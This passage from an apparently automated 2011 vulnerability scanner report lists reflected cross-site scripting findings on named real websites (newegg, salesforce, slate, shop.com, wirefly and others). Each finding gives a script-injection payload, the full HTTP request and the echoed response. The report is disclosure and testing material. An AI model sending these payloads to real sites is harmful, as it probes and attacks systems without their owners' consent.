The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 622f8"><script>alert(1)</script>640de775307 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico622f8"><script>alert(1)</script>640de775307 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: newegg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.newegg.com/favicon.ico622f8"><script>alert(1)</script>640de775307
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.newegg.com/favicon.ico622f8"><script>alert(1)</script>640de775307">here</a> </body>

2.57. http://newegg.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newegg.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c7fe"><script>alert(1)</script>644f1e6f187 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4c7fe"><script>alert(1)</script>644f1e6f187=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: newegg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.newegg.com/favicon.ico?4c7fe"><script>alert(1)</script>644f1e6f187=1
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.newegg.com/favicon.ico?4c7fe"><script>alert(1)</script>644f1e6f187=1">here</a> </body>

2.58. http://popeater.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://popeater.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c2a4"><script>alert(1)</script>ab73f1f9636 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9c2a4"><script>alert(1)</script>ab73f1f9636=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: popeater.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:09:03 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 31 Mar 2011 19:39:03 GMT
Content-length: 147
Content-type: text/html
Location: http://www.popeater.com/favicon.ico?9c2a4"><script>alert(1)</script>ab73f1f9636=1

<html>
<body>
Page relocated <a href="http://www.popeater.com/favicon.ico?9c2a4"><script>alert(1)</script>ab73f1f9636=1">here.</a>
</body>
</html>

2.59. http://salesforce.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84a14<script>alert(1)</script>0f346a952a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico84a14<script>alert(1)</script>0f346a952a5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/favicon.ico84a14<script>alert(1)</script>0f346a952a5
Date: Thu, 31 Mar 2011 19:26:39 GMT
Content-Length: 193

The URL has moved to <a href="http://www.salesforce.com/favicon.ico84a14<script>alert(1)</script>0f346a952a5">http://www.salesforce.com/favicon.ico84a14<script>alert(1)</script>0f346a952a5</a>

2.60. http://salesforce.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e156"><script>alert(1)</script>b1a959d0ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico8e156"><script>alert(1)</script>b1a959d0ba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/favicon.ico8e156"><script>alert(1)</script>b1a959d0ba
Date: Thu, 31 Mar 2011 19:26:38 GMT
Content-Length: 195

The URL has moved to <a href="http://www.salesforce.com/favicon.ico8e156"><script>alert(1)</script>b1a959d0ba">http://www.salesforce.com/favicon.ico8e156"><script>alert(1)</script>b1a959d0ba</a>

2.61. http://salesforce.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://salesforce.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload db210<script>alert(1)</script>83b85c5e74e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?db210<script>alert(1)</script>83b85c5e74e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/favicon.ico?db210<script>alert(1)</script>83b85c5e74e=1
Date: Thu, 31 Mar 2011 19:26:37 GMT
Content-Length: 199

The URL has moved to <a href="http://www.salesforce.com/favicon.ico?db210<script>alert(1)</script>83b85c5e74e=1">http://www.salesforce.com/favicon.ico?db210<script>alert(1)</script>83b85c5e74e=1</a>

2.62. http://salesforce.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://salesforce.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb618"><script>alert(1)</script>cf73b6ad0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?cb618"><script>alert(1)</script>cf73b6ad0d9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/favicon.ico?cb618"><script>alert(1)</script>cf73b6ad0d9=1
Date: Thu, 31 Mar 2011 19:26:37 GMT
Content-Length: 203

The URL has moved to <a href="http://www.salesforce.com/favicon.ico?cb618"><script>alert(1)</script>cf73b6ad0d9=1">http://www.salesforce.com/favicon.ico?cb618"><script>alert(1)</script>cf73b6ad0d9=1</
...[SNIP]...

2.63. http://shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b4ba"><script>alert(1)</script>b1592e46080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?2b4ba"><script>alert(1)</script>b1592e46080=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 19:34:53 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?2b4ba"><script>alert(1)</script>b1592e46080=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?2b4ba"><script>alert(1)</script>b1592e46080=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?2b4ba"><script>alert(1)</script>b1592e46080=1">
...[SNIP]...

2.64. http://shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload dad1e><script>alert(1)</script>a2cba22d204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?dad1e><script>alert(1)</script>a2cba22d204=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 19:34:53 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?dad1e><script>alert(1)</script>a2cba22d204=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?dad1e><script>alert(1)</script>a2cba22d204=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

2.65. http://slate.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://slate.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae49b"><script>alert(1)</script>2227e1d04f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?ae49b"><script>alert(1)</script>2227e1d04f3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: slate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:02:53 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 255
Location: http://www.slate.com/favicon.ico?ae49b"><script>alert(1)</script>2227e1d04f3=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.slate.com/favicon.ico?ae49b"><script>alert(1)</script>2227e1d04f3=1">http://www.slate.com/favicon.ico?ae49b"><
...[SNIP]...

2.66. http://slate.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://slate.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2b955<script>alert(1)</script>800ecf49611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?2b955<script>alert(1)</script>800ecf49611=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: slate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:02:53 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 251
Location: http://www.slate.com/favicon.ico?2b955<script>alert(1)</script>800ecf49611=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.slate.com/favicon.ico?2b955<script>alert(1)</script>800ecf49611=1">http://www.slate.com/favicon.ico?2b955<script>alert(1)</script>800ecf49611=1</a>
...[SNIP]...

2.67. http://stltoday.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stltoday.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ab8"style%3d"x%3aexpression(alert(1))"0cd553f6bfc was submitted in the REST URL parameter 1. This input was echoed as 93ab8"style="x:expression(alert(1))"0cd553f6bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /93ab8"style%3d"x%3aexpression(alert(1))"0cd553f6bfc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: stltoday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
Content-Type: text/html
Date: Thu, 31 Mar 2011 19:34:04 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://www.stltoday.com/93ab8"style="x:expression(alert(1))"0cd553f6bfc/
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: stltoday.com
Content-Length: 644

<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>301 Moved Permanently</title></head><body>
<script type='text/javascript' src='http://stats-newyork1.bloxcms.com/shared-content/st
...[SNIP]...
<a href="http://www.stltoday.com/93ab8"style="x:expression(alert(1))"0cd553f6bfc/">
...[SNIP]...

2.68. http://stylelist.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stylelist.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c91"><script>alert(1)</script>e49d5f2c07f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?17c91"><script>alert(1)</script>e49d5f2c07f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: stylelist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:34:15 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 31 Mar 2011 20:04:15 GMT
Content-length: 148
Content-type: text/html
Location: http://www.stylelist.com/favicon.ico?17c91"><script>alert(1)</script>e49d5f2c07f=1

<html>
<body>
Page relocated <a href="http://www.stylelist.com/favicon.ico?17c91"><script>alert(1)</script>e49d5f2c07f=1">here.</a>
</body>
</html>

2.69. http://tvsquad.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tvsquad.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3637d"><script>alert(1)</script>f9f6835a23a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?3637d"><script>alert(1)</script>f9f6835a23a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: tvsquad.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:28:43 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 31 Mar 2011 19:58:43 GMT
Content-length: 146
Content-type: text/html
Location: http://www.tvsquad.com/favicon.ico?3637d"><script>alert(1)</script>f9f6835a23a=1

<html>
<body>
Page relocated <a href="http://www.tvsquad.com/favicon.ico?3637d"><script>alert(1)</script>f9f6835a23a=1">here.</a>
</body>
</html>

2.70. http://redcated/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://redcated
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Issue detail

The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76d29"><a>5f0f37ff341 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1297806090-1101785676d29"><a>5f0f37ff341; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; ach00=66c2/39a1:12eae/37b3:9cc2/26d97:94dd/33f2:b734/120af:9cc2/1c4e; ach01=b97d026/39a1/1101ce62/66c2/4d6d14c5:c1c6eec/37b3/1208a1ac/12eae/4d76973e:b9e6a5b/26d97/11cab02b/9cc2/4d7b6f5f:b16ac93/33f2/fdea494/94dd/4d80f470:b9ec1c9/120af/123e12d8/b734/4d8b571f:158f3cc/1c4e/2ac3a8d/9cc2/4d90e47c

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 275
Content-Type: text/html
Expires: 0
Connection: close
Date: Thu, 31 Mar 2011 19:26:54 GMT

<html><body><img src="http://spe.redcated/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetMicrosoftCookie(%22AA002%22, %221297806090-1101785676d29"><a>5f0f37ff341%22)" width="1" height="1" border="0" />
...[SNIP]...

2.71. http://wirefly.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wirefly.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 66a73<script>alert(1)</script>7b479c7bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?66a73<script>alert(1)</script>7b479c7bf9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: wirefly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:31:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 253
Location: http://www.wirefly.com/favicon.ico?66a73<script>alert(1)</script>7b479c7bf9=1
Set-Cookie: BIPcookie=eU5CBtIUoWnfEkRAWJM+5/o+X9gdPOdQFR80mnDBN/+knZwse5oKcrGsITJDMrTH5z2LwW2U; expires=Thu, 31-Mar-2011 19:41:35 GMT; path=/

<html><body>The requested resource was moved. It could be found here: <a href="http://www.wirefly.com/favicon.ico?66a73<script>alert(1)</script>7b479c7bf9=1">http://www.wirefly.com/favicon.ico?66a73<script>alert(1)</script>7b479c7bf9=1</a>
...[SNIP]...

2.72. http://wirefly.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wirefly.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b699"><script>alert(1)</script>ac6607c6182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5b699"><script>alert(1)</script>ac6607c6182=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: wirefly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:31:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 259
Location: http://www.wirefly.com/favicon.ico?5b699"><script>alert(1)</script>ac6607c6182=1
Set-Cookie: BIPcookie=tUM3eN+BmBelPpGdCiZ0tzo8akmFyDgOyrFU/hghxfRxjEN/kqP6STHYMY86mqNyOdQi7HMT; expires=Thu, 31-Mar-2011 19:41:35 GMT; path=/

<html><body>The requested resource was moved. It could be found here: <a href="http://www.wirefly.com/favicon.ico?5b699"><script>alert(1)</script>ac6607c6182=1">http://www.wirefly.com/favicon.ico?5b69
...[SNIP]...

Report generated by XSS.CX at Thu Mar 31 14:40:10 CDT 2011.